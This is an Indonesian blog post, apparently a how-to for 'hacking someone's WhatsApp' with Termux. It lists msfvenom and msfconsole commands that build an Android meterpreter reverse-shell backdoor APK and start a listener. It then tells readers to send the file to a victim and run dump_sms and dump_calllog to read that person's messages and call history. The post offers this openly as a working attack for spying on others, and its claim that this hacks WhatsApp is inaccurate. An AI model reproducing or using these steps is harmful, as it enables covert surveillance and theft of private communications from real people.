Trik Jitu Menghack WA Orang Pake Termux

Cara Hack WA Pake Termux Jarak Jauh No Root - Banyak orang yang bilang jika chatting menggunakan aplikasi lebih mudah di bandingkan dengan SMS atau yang lain. Saking banyak orang yang menggunakan aplikasi chatting kini adalah salah satu aplikasi chatting yang paling aman dan penampilannya juga simple alias tidak ribet. Siapa lagi jika bukan Whatsapp, WA atau Whatsapp ini merupakan aplikasi chatting yang paling aman saking amannya abnyak rang melakukan hal negatif melalui WA. Oleh karena itu banyak orang yang mancari cara unyuk menghack whatsapp, Sebenarnya sih mudah untuk menghack whatsapp dengan menggunakan bantuan aplikasi hack yaitu termux.
Termux adalah sebuah aplikasi android dimana fungsinya untuk membantu kita dalam melakukan hack menghack. oleh karena itu banyak orang yang menggunakan aplikasi termux ini untuk menghack game, aplikasi chatting dan yang lainnya. Kenapa banyak orang menggunakan aplikasi ini ?? karena apilkasi ini akan meberikan sebuah akses atau terminala sehingga kita akan bisa mebggunkan linux. Oke tidak usah lama-lama lagi kita langsung saja ke tutorial megenai cara hack wa pake termux jarak jauh no root. Untuk info lebih lngkapnya lagi silahkan kalian lihat dibawah ini.

Cara Hack WA Pake Termux Jarak Jauh No Root Terbaru

Dalam melakukan cara ini maka kalian harus download aplikasi termux terlebih dahulu di gogle playstore. Kenapa harus download termux ?? karena aplikasi ini akan mebantu kita untuk melakukan hack wa. Langkah-langkahnya sebagai berikut :
  1. Masuk ke termux untuk lihat IP dengan ketik ifconfig
  2. Ubah alamat IP ini ini msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk
    – LHOST dengan alat IP kalian
  3. Cek file backdoor dengan mencari FILE > HOME > hack.apk
  4. Klik file backdoor lalu pastekan dan jangan sampai lupa untuk pastikan bahwa kalian harus samakan script file dibawah
  5. msfconsole
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost 192.168.43.166
    set lport 4444
    exploit
  6. Kirim file tersebit ke korban yang ingin di hack atau kirim ke medsos
  7. ketik dump_sms fungsiniya supaya dapat melihat riwayat pesan
    ketik dump_calllog fungsiniya supaya dapat melihat histori panggilan
  8. Untuk cek pesan dan history kalian bisa ketikan cara di no 7
  9. Selesai
Itulah ulasan informasi yang saya bagikan kepada kalian mengenai cara hack wa pake termux jarak jauh no root, dan jangan samapai ketinggalan info menarik lainnya di blog ini. Salam senyum :)
Trik Jitu Menghack WA Orang Pake Termux | tarkiman | 5